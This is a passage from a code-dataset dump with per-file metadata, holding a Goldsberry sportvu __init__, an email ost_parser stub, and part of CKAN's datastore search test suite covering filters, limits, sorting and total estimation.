| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a2a4779cfd1fbc28d7e5e9d6358df0aad3d721a
| 42
|
py
|
Python
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
|
fe238b07142cff64eda37e402bb003251af13f9b
|
[
"MIT"
] | 268
|
2015-07-28T18:49:06.000Z
|
2022-03-06T03:08:18.000Z
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
|
fe238b07142cff64eda37e402bb003251af13f9b
|
[
"MIT"
] | 24
|
2015-07-06T22:50:59.000Z
|
2021-07-05T05:10:26.000Z
|
goldsberry/sportvu/__init__.py
|
motraor3/py-Goldsberry
|
fe238b07142cff64eda37e402bb003251af13f9b
|
[
"MIT"
] | 85
|
2015-08-08T17:45:28.000Z
|
2021-11-10T09:35:26.000Z
|
from goldsberry.sportvu._SportVu2 import *
| 42
| 42
| 0.857143
| 5
| 42
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025641
| 0.071429
| 42
| 1
| 42
| 42
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0a659c5f115b2e705b7c1a1bbdc91ea33857a790
| 169
|
py
|
Python
|
modules/app_email/EmailParser/ost_parser.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 56
|
2019-02-07T06:21:45.000Z
|
2022-03-21T08:19:24.000Z
|
modules/app_email/EmailParser/ost_parser.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 5
|
2020-05-25T17:29:00.000Z
|
2021-12-13T20:49:08.000Z
|
modules/app_email/EmailParser/ost_parser.py
|
naaya17/carpe
|
fa2e3cfebe20f8839c985e5b9b78b538800172a1
|
[
"Apache-2.0"
] | 31
|
2019-03-13T10:23:49.000Z
|
2021-11-04T12:14:58.000Z
|
import EmailParser.pst_parser
"""
if __name__ == "__main__":
pass
else:
from EmailBoxClass import EmailBox
EmailBox.main = EmailParser.pst_parser.main
"""
| 16.9
| 47
| 0.715976
| 19
| 169
| 5.842105
| 0.631579
| 0.252252
| 0.36036
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183432
| 169
| 9
| 48
| 18.777778
| 0.804348
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0a6f1707341f08e50621a8059a817b5a455fcc83
| 75,843
|
py
|
Python
|
ckanext/datastore/tests/test_search.py
|
shubhamsharma10/ckan
|
08a8c31970ad9f58265aeaae53157058dba2e5a3
|
[
"Apache-2.0"
] | 1
|
2021-03-20T20:45:04.000Z
|
2021-03-20T20:45:04.000Z
|
ckanext/datastore/tests/test_search.py
|
shubhamsharma10/ckan
|
08a8c31970ad9f58265aeaae53157058dba2e5a3
|
[
"Apache-2.0"
] | null | null | null |
ckanext/datastore/tests/test_search.py
|
shubhamsharma10/ckan
|
08a8c31970ad9f58265aeaae53157058dba2e5a3
|
[
"Apache-2.0"
] | 2
|
2019-03-06T11:24:13.000Z
|
2019-03-15T01:31:49.000Z
|
# encoding: utf-8
import json
import pytest
import sqlalchemy.orm as orm
import ckan.lib.create_test_data as ctd
import ckan.logic as logic
import ckan.model as model
import ckan.plugins as p
import ckan.tests.factories as factories
import ckan.tests.helpers as helpers
import ckan.tests.legacy as tests
import ckanext.datastore.backend.postgres as db
from ckanext.datastore.tests.helpers import extract
@pytest.mark.usefixtures("with_request_context")
class TestDatastoreSearch(object):
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_fts_on_field_calculates_ranks_only_on_that_specific_field(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"from": "Brazil", "to": "Brazil"},
{"from": "Brazil", "to": "Italy"},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"fields": "from, rank from",
"q": {"from": "Brazil"},
}
result = helpers.call_action("datastore_search", **search_data)
ranks = [r["rank from"] for r in result["records"]]
assert len(result["records"]) == 2
assert len(set(ranks)) == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_fts_works_on_non_textual_fields(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"from": "Brazil", "year": {"foo": 2014}},
{"from": "Brazil", "year": {"foo": 1986}},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"fields": "year",
"plain": False,
"q": {"year": "20:*"},
}
result = helpers.call_action("datastore_search", **search_data)
assert len(result["records"]) == 1
assert result["records"][0]["year"] == {"foo": 2014}
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_all_params_work_with_fields_with_whitespaces(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"fields": "the year",
"sort": "the year",
"filters": {"the year": 2013},
"q": {"the year": "2013"},
}
result = helpers.call_action("datastore_search", **search_data)
result_years = [r["the year"] for r in result["records"]]
assert result_years == [2013]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_total(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "include_total": True}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_without_total(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "include_total": False}
result = helpers.call_action("datastore_search", **search_data)
assert "total" not in result
assert "total_was_estimated" not in result
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": 50,
}
result = helpers.call_action("datastore_search", **search_data)
assert result.get("total_was_estimated")
assert 95 < result["total"] < 105, result["total"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_with_filters(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(3)] * 10,
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"filters": {u"the year": 1901},
"total_estimation_threshold": 5,
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 10
# estimation is not compatible with filters
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_with_distinct(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(3)] * 10,
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"fields": ["the year"],
"distinct": True,
"total_estimation_threshold": 1,
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 3
# estimation is not compatible with distinct
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_where_analyze_is_not_already_done(self):
# ANALYSE is done by latest datapusher/xloader, but need to cope in
# if tables created in other ways which may not have had an ANALYSE
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": 50,
}
result = helpers.call_action("datastore_search", **search_data)
assert result.get("total_was_estimated")
assert 95 < result["total"] < 105, result["total"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_with_zero_threshold(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": 0,
}
result = helpers.call_action("datastore_search", **search_data)
# threshold of 0 means always estimate
assert result.get("total_was_estimated")
assert 95 < result["total"] < 105, result["total"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_off(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
"total_estimation_threshold": None,
}
result = helpers.call_action("datastore_search", **search_data)
# threshold of None means don't estimate
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_estimate_total_default_off(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 1900 + i} for i in range(100)],
}
result = helpers.call_action("datastore_create", **data)
analyze_sql = """
ANALYZE "{resource}";
""".format(
resource=resource["id"]
)
db.get_write_engine().execute(analyze_sql)
search_data = {
"resource_id": resource["id"],
# don't specify total_estimation_threshold
}
result = helpers.call_action("datastore_search", **search_data)
# default threshold is None, meaning don't estimate
assert not (result.get("total_was_estimated"))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_limit(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "limit": 1}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert result["records"] == [{u"the year": 2014, u"_id": 1}]
assert result["limit"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_limit_invalid(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "limit": "bad"}
with pytest.raises(logic.ValidationError, match="Invalid integer"):
helpers.call_action("datastore_search", **search_data)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_limit_invalid_negative(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
helpers.call_action("datastore_create", **data)
search_data = {"resource_id": resource["id"], "limit": -1}
with pytest.raises(
logic.ValidationError, match="Must be a natural number"
):
helpers.call_action("datastore_search", **search_data)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_default", "1")
def test_search_limit_config_default(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
# limit not specified - leaving to the configured default of 1
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert result["records"] == [{u"the year": 2014, u"_id": 1}]
assert result["limit"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_default", "1")
def test_search_limit_config(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"the year": 2015},
{"the year": 2014},
{"the year": 2013},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"limit": 2, # specified limit overrides the rows_default
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 3
assert result["records"] == [
{u"the year": 2015, u"_id": 1},
{u"the year": 2014, u"_id": 2},
]
assert result["limit"] == 2
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_max", "1")
def test_search_limit_config_max(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
# limit not specified - leaving to the configured default of 1
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 2
assert result["records"] == [{u"the year": 2014, u"_id": 1}]
assert result["limit"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_default", "1")
@pytest.mark.ckan_config("ckan.datastore.search.rows_max", "2")
def test_search_limit_config_combination(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"the year": 2016},
{"the year": 2015},
{"the year": 2014},
{"the year": 2013},
],
}
result = helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"limit": 3, # ignored because it is above rows_max
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 4
# returns 2 records,
# ignoring the rows_default because we specified limit
# but limit is more than rows_max so rows_max=2 wins
assert result["records"] == [
{u"the year": 2016, u"_id": 1},
{u"the year": 2015, u"_id": 2},
]
assert result["limit"] == 2
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filter_with_percent_in_column_name(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"primary_key": "id",
"fields": [
{"id": "id", "type": "text"},
{"id": "bo%ok", "type": "text"},
{"id": "author", "type": "text"},
],
"records": [{"id": "1%", "bo%ok": u"El Nino", "author": "Torres"}],
}
helpers.call_action("datastore_create", **data)
search_data = {
"resource_id": resource["id"],
"filters": {u"bo%ok": "El Nino"},
}
result = helpers.call_action("datastore_search", **search_data)
assert result["total"] == 1
@pytest.mark.usefixtures("with_request_context")
class TestDatastoreSearchLegacyTests(object):
sysadmin_user = None
normal_user = None
@pytest.fixture(autouse=True)
def initial_data(self, clean_datastore, app):
ctd.CreateTestData.create()
self.sysadmin_user = model.User.get("testsysadmin")
self.normal_user = model.User.get("annafan")
self.dataset = model.Package.get("annakarenina")
self.resource = self.dataset.resources[0]
self.data = {
"resource_id": self.resource.id,
"force": True,
"aliases": "books3",
"fields": [
{"id": u"b\xfck", "type": "text"},
{"id": "author", "type": "text"},
{"id": "published"},
{"id": u"characters", u"type": u"_text"},
{"id": "rating with %"},
],
"records": [
{
u"b\xfck": "annakarenina",
"author": "tolstoy",
"published": "2005-03-01",
"nested": ["b", {"moo": "moo"}],
u"characters": [u"Princess Anna", u"Sergius"],
"rating with %": "60%",
},
{
u"b\xfck": "warandpeace",
"author": "tolstoy",
"nested": {"a": "b"},
"rating with %": "99%",
},
],
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_create", json=self.data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
# Make an organization, because private datasets must belong to one.
self.organization = tests.call_action_api(
app,
"organization_create",
name="test_org",
apikey=self.sysadmin_user.apikey,
)
self.expected_records = [
{
u"published": u"2005-03-01T00:00:00",
u"_id": 1,
u"nested": [u"b", {u"moo": u"moo"}],
u"b\xfck": u"annakarenina",
u"author": u"tolstoy",
u"characters": [u"Princess Anna", u"Sergius"],
u"rating with %": u"60%",
},
{
u"published": None,
u"_id": 2,
u"nested": {u"a": u"b"},
u"b\xfck": u"warandpeace",
u"author": u"tolstoy",
u"characters": None,
u"rating with %": u"99%",
},
]
engine = db.get_write_engine()
self.Session = orm.scoped_session(orm.sessionmaker(bind=engine))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_basic(self, app):
data = {"resource_id": self.data["resource_id"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == self.expected_records, result["records"]
# search with parameter id should yield the same results
data = {"id": self.data["resource_id"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == self.expected_records, result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_private_dataset(self, app):
group = self.dataset.get_groups()[0]
context = {
"user": self.sysadmin_user.name,
"ignore_auth": True,
"model": model,
}
package = p.toolkit.get_action("package_create")(
context,
{
"name": "privatedataset",
"private": True,
"owner_org": self.organization["id"],
"groups": [{"id": group.id}],
},
)
resource = p.toolkit.get_action("resource_create")(
context,
{
"name": "privateresource",
"url": "https://www.example.com/",
"package_id": package["id"],
},
)
helpers.call_action("datastore_create", resource_id=resource["id"], force=True)
data = {"resource_id": resource["id"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_alias(self, app):
data = {"resource_id": self.data["aliases"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict_alias = json.loads(res.data)
result = res_dict_alias["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == self.expected_records, result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid_field(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": [{"id": "bad"}],
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_fields(self, app):
data = {"resource_id": self.data["resource_id"], "fields": [u"b\xfck"]}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == [
{u"b\xfck": "annakarenina"},
{u"b\xfck": "warandpeace"},
], result["records"]
data = {
"resource_id": self.data["resource_id"],
"fields": u"b\xfck, author",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == len(self.data["records"])
assert result["records"] == [
{u"b\xfck": "annakarenina", "author": "tolstoy"},
{u"b\xfck": "warandpeace", "author": "tolstoy"},
], result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_distinct(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": [u"author"],
"distinct": True,
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [{u"author": "tolstoy"}], result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filters(self, app):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"b\xfck": "annakarenina"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [self.expected_records[0]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filter_array_field(self, app):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"characters": [u"Princess Anna", u"Sergius"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [self.expected_records[0]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_multiple_filters_on_same_field(self, app):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"b\xfck": [u"annakarenina", u"warandpeace"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filter_normal_field_passing_multiple_values_in_array(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": {u"b\xfck": [u"annakarenina", u"warandpeace"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records, result["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_filters_get(self, app):
filters = {u"b\xfck": "annakarenina"}
res = app.get(
"/api/action/datastore_search?resource_id={0}&filters={1}".format(
self.data["resource_id"], json.dumps(filters)
)
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
assert result["records"] == [self.expected_records[0]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid_filter(self, app):
data = {
"resource_id": self.data["resource_id"],
# invalid because author is not a numeric field
"filters": {u"author": 42},
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_sort(self, app):
data = {
"resource_id": self.data["resource_id"],
"sort": u"b\xfck asc, author desc",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records, result["records"]
data = {
"resource_id": self.data["resource_id"],
"sort": [u"b\xfck desc", '"author" asc'],
}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == self.expected_records[::-1]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid(self, app):
data = {
"resource_id": self.data["resource_id"],
"sort": u"f\xfc\xfc asc",
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
error_msg = res_dict["error"]["sort"][0]
assert (
u"f\xfc\xfc" in error_msg
), 'Expected "{0}" to contain "{1}"'.format(error_msg, u"f\xfc\xfc")
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_offset(self, app):
data = {
"resource_id": self.data["resource_id"],
"limit": 1,
"offset": 1,
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
assert result["records"] == [self.expected_records[1]]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_invalid_offset(self, app):
data = {"resource_id": self.data["resource_id"], "offset": "bad"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
data = {"resource_id": self.data["resource_id"], "offset": -1}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text(self, app):
data = {"resource_id": self.data["resource_id"], "q": "annakarenina"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
results = [
extract(
result["records"][0],
[
u"_id",
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
]
assert results == [self.expected_records[0]], results["records"]
data = {"resource_id": self.data["resource_id"], "q": "tolstoy"}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 2
results = [
extract(
record,
[
u"_id",
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
for record in result["records"]
]
assert results == self.expected_records, result["records"]
expected_fields = [
{u"type": u"int", u"id": u"_id"},
{u"type": u"text", u"id": u"b\xfck"},
{u"type": u"text", u"id": u"author"},
{u"type": u"timestamp", u"id": u"published"},
{u"type": u"json", u"id": u"nested"},
]
for field in expected_fields:
assert field in result["fields"]
# test multiple word queries (connected with and)
data = {
"resource_id": self.data["resource_id"],
"plain": True,
"q": "tolstoy annakarenina",
}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["total"] == 1
results = [
extract(
result["records"][0],
[
u"_id",
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
]
assert results == [self.expected_records[0]], results["records"]
for field in expected_fields:
assert field in result["fields"], field
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {u"b\xfck": "annakarenina"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
